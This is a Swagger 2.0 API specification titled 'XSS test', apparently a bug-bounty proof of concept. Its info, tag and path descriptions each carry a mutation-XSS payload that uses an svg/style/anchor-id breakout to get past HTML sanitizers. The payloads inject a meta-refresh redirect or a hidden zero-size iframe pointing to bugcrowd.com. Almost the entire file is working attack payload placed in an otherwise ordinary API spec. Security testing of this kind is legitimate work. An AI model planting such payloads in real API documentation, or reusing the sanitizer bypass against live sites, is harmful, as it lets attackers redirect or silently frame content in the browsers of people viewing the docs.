swagger: "2.0"
info:
  title: "XSS test"
  version: "1.0.0"
  description: |
    <svg></p><style><a id="</style><meta http-equiv="refresh" content="0;url=https://bugcrowd.com">">
tags:
  - name: "t1"
    description: |
      <svg></p><style><a id="</style><iframe src="https://bugcrowd.com" width="0" height="0"></iframe>">
paths:
  /x:
    get:
      summary: "x"
      description: |
        <svg></p><style><a id="</style><iframe srcdoc="<meta http-equiv='refresh' content='0;url=https://bugcrowd.com'>"></iframe>">
      responses:
        "200": { description: "OK" }
